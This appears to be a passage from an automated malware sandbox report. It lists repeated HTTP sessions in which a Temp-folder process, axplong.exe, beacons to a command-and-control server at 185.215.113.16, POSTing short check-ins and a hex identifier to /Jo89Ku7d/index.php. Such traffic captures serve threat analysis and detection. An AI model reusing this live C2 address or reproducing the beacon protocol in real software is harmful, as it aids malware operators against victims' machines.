                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:24 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Refresh: 0; url = Login.php
                                                                                                                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 1 0
                                                                                                                                                                Sep 27, 2024 17:42:25.859296083 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:25 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.4 | 49784 | 185.215.113.16 | 80 | 2304 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Timestamp | Bytes transferred | Direction | Data
Sep 27, 2024 17:42:25.980649948 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.16
Content-Length: 4
Cache-Control: no-cache
Data Raw: 73 74 3d 73
Data Ascii: st=s
Sep 27, 2024 17:42:26.706039906 CEST | 219 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 27 Sep 2024 15:42:26 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Refresh: 0; url = Login.php
Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
Data Ascii: 1 0
Sep 27, 2024 17:42:26.708297014 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.16
Content-Length: 154
Cache-Control: no-cache
Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 42 41 37 34 35 43 43 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9FBA745CCFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 17:42:27.003106117 CEST | 196 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 27 Sep 2024 15:42:26 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.4 | 49787 | 185.215.113.16 | 80 | 2304 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Timestamp | Bytes transferred | Direction | Data
Sep 27, 2024 17:42:27.129723072 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.16
Content-Length: 4
Cache-Control: no-cache
Data Raw: 73 74 3d 73
Data Ascii: st=s
Sep 27, 2024 17:42:27.951656103 CEST | 219 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 27 Sep 2024 15:42:27 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Refresh: 0; url = Login.php
Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
Data Ascii: 1 0
Sep 27, 2024 17:42:27.952778101 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.16
Content-Length: 154
Cache-Control: no-cache
Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 42 41 37 34 35 43 43 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9FBA745CCFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 17:42:28.227019072 CEST | 196 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 27 Sep 2024 15:42:28 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.4 | 49790 | 185.215.113.16 | 80 | 2304 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Timestamp | Bytes transferred | Direction | Data
Sep 27, 2024 17:42:28.342701912 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.16
Content-Length: 4
Cache-Control: no-cache
Data Raw: 73 74 3d 73
Data Ascii: st=s
Sep 27, 2024 17:42:29.073491096 CEST | 219 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 27 Sep 2024 15:42:28 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Refresh: 0; url = Login.php
Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
Data Ascii: 1 0
Sep 27, 2024 17:42:29.074568033 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.16
Content-Length: 154
Cache-Control: no-cache
Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 42 41 37 34 35 43 43 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9FBA745CCFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 17:42:29.298993111 CEST | 196 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 27 Sep 2024 15:42:29 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.4 | 49791 | 185.215.113.16 | 80 | 2304 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Timestamp | Bytes transferred | Direction | Data
Sep 27, 2024 17:42:29.420056105 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Host: 185.215.113.16
    Content-Length: 4
    Cache-Control: no-cache
    Data Raw: 73 74 3d 73
    Data Ascii: st=s
Sep 27, 2024 17:42:30.183695078 CEST | 219 | IN | HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Fri, 27 Sep 2024 15:42:30 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Refresh: 0; url = Login.php
    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
    Data Ascii: 1 0
Sep 27, 2024 17:42:30.184762001 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Host: 185.215.113.16
    Content-Length: 154
    Cache-Control: no-cache
    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 42 41 37 34 35 43 43 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9FBA745CCFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 17:42:30.460691929 CEST | 196 | IN | HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Fri, 27 Sep 2024 15:42:30 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
    Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.4 | 49794 | 185.215.113.16 | 80 | 2304 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Timestamp | Bytes transferred | Direction | Data
Sep 27, 2024 17:42:30.580265045 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Host: 185.215.113.16
    Content-Length: 4
    Cache-Control: no-cache
    Data Raw: 73 74 3d 73
    Data Ascii: st=s
Sep 27, 2024 17:42:31.323282957 CEST | 219 | IN | HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Fri, 27 Sep 2024 15:42:31 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Refresh: 0; url = Login.php
    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
    Data Ascii: 1 0
Sep 27, 2024 17:42:31.325284958 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Host: 185.215.113.16
    Content-Length: 154
    Cache-Control: no-cache
    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 42 41 37 34 35 43 43 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9FBA745CCFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 17:42:31.550769091 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Host: 185.215.113.16
    Content-Length: 154
    Cache-Control: no-cache
    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 42 41 37 34 35 43 43 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9FBA745CCFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 17:42:31.624974012 CEST | 219 | IN | HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Fri, 27 Sep 2024 15:42:31 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Refresh: 0; url = Login.php
    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
    Data Ascii: 1 0
Sep 27, 2024 17:42:31.844080925 CEST | 196 | IN | HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Fri, 27 Sep 2024 15:42:31 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
    Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.2.4 | 49797 | 185.215.113.16 | 80 | 2304 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Timestamp | Bytes transferred | Direction | Data
Sep 27, 2024 17:42:31.967492104 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Host: 185.215.113.16
    Content-Length: 4
    Cache-Control: no-cache
    Data Raw: 73 74 3d 73
    Data Ascii: st=s
Sep 27, 2024 17:42:32.714004993 CEST | 219 | IN | HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Fri, 27 Sep 2024 15:42:32 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Refresh: 0; url = Login.php
    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
    Data Ascii: 1 0
Sep 27, 2024 17:42:32.715043068 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Host: 185.215.113.16
    Content-Length: 154
    Cache-Control: no-cache
    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 42 41 37 34 35 43 43 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9FBA745CCFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 17:42:32.979856968 CEST | 196 | IN | HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Fri, 27 Sep 2024 15:42:32 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
    Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
24 | 192.168.2.4 | 49802 | 185.215.113.16 | 80 | 2304 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Timestamp | Bytes transferred | Direction | Data
Sep 27, 2024 17:42:33.122531891 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Host: 185.215.113.16
    Content-Length: 4
    Cache-Control: no-cache
    Data Raw: 73 74 3d 73
    Data Ascii: st=s
Sep 27, 2024 17:42:33.378901005 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Host: 185.215.113.16
    Content-Length: 4
    Cache-Control: no-cache
    Data Raw: 73 74 3d 73
    Data Ascii: st=s
Sep 27, 2024 17:42:33.943217039 CEST | 219 | IN | HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Fri, 27 Sep 2024 15:42:33 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Refresh: 0; url = Login.php
    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
    Data Ascii: 1 0
Sep 27, 2024 17:42:33.944351912 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Host: 185.215.113.16
    Content-Length: 154
    Cache-Control: no-cache
    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 42 41 37 34 35 43 43 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                                                                                Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9FBA745CCFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                                                                                Sep 27, 2024 17:42:34.340359926 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:34 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 7 <c><d>0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
25          192.168.2.4  49805        185.215.113.16  80                2304  C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp                             Bytes transferred  Direction  Data
Sep 27, 2024 17:42:34.548861027 CEST  156                OUT        POST /Jo89Ku7d/index.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Host: 185.215.113.16
    Content-Length: 4
    Cache-Control: no-cache
    Data Raw: 73 74 3d 73
    Data Ascii: st=s
Sep 27, 2024 17:42:35.274259090 CEST  219                IN         HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Fri, 27 Sep 2024 15:42:35 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Refresh: 0; url = Login.php
    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
    Data Ascii: 1 0
Sep 27, 2024 17:42:35.275623083 CEST  308                OUT        POST /Jo89Ku7d/index.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Host: 185.215.113.16
    Content-Length: 154
    Cache-Control: no-cache
    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 42 41 37 34 35 43 43 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9FBA745CCFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 17:42:35.504559994 CEST  196                IN         HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Fri, 27 Sep 2024 15:42:35 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
    Data Ascii: 7 <c><d>0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
26          192.168.2.4  49808        185.215.113.16  80                2304  C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp                             Bytes transferred  Direction  Data
Sep 27, 2024 17:42:35.620328903 CEST  156                OUT        POST /Jo89Ku7d/index.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Host: 185.215.113.16
    Content-Length: 4
    Cache-Control: no-cache
    Data Raw: 73 74 3d 73
    Data Ascii: st=s
Sep 27, 2024 17:42:36.327580929 CEST  219                IN         HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Fri, 27 Sep 2024 15:42:36 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Refresh: 0; url = Login.php
    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
    Data Ascii: 1 0
Sep 27, 2024 17:42:36.345884085 CEST  308                OUT        POST /Jo89Ku7d/index.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Host: 185.215.113.16
    Content-Length: 154
    Cache-Control: no-cache
    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 42 41 37 34 35 43 43 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9FBA745CCFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 17:42:36.586858988 CEST  196                IN         HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Fri, 27 Sep 2024 15:42:36 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
    Data Ascii: 7 <c><d>0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
27          192.168.2.4  49809        185.215.113.16  80                2304  C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp                             Bytes transferred  Direction  Data
Sep 27, 2024 17:42:36.697875023 CEST  156                OUT        POST /Jo89Ku7d/index.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Host: 185.215.113.16
    Content-Length: 4
    Cache-Control: no-cache
    Data Raw: 73 74 3d 73
    Data Ascii: st=s
Sep 27, 2024 17:42:37.483922005 CEST  219                IN         HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Fri, 27 Sep 2024 15:42:37 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Refresh: 0; url = Login.php
    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
    Data Ascii: 1 0
Sep 27, 2024 17:42:37.484781981 CEST  308                OUT        POST /Jo89Ku7d/index.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Host: 185.215.113.16
    Content-Length: 154
    Cache-Control: no-cache
    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 42 41 37 34 35 43 43 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9FBA745CCFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 17:42:37.731792927 CEST  196                IN         HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Fri, 27 Sep 2024 15:42:37 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
    Data Ascii: 7 <c><d>0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
28          192.168.2.4  49812        185.215.113.16  80                2304  C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp                             Bytes transferred  Direction  Data
Sep 27, 2024 17:42:37.858397961 CEST  156                OUT        POST /Jo89Ku7d/index.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Host: 185.215.113.16
    Content-Length: 4
    Cache-Control: no-cache
    Data Raw: 73 74 3d 73
    Data Ascii: st=s
Sep 27, 2024 17:42:38.553558111 CEST  219                IN         HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Fri, 27 Sep 2024 15:42:38 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Refresh: 0; url = Login.php
    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
    Data Ascii: 1 0
Sep 27, 2024 17:42:38.570581913 CEST  308                OUT        POST /Jo89Ku7d/index.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Host: 185.215.113.16
    Content-Length: 154
    Cache-Control: no-cache
    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 42 41 37 34 35 43 43 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9FBA745CCFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 17:42:38.802301884 CEST  196                IN         HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Fri, 27 Sep 2024 15:42:38 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
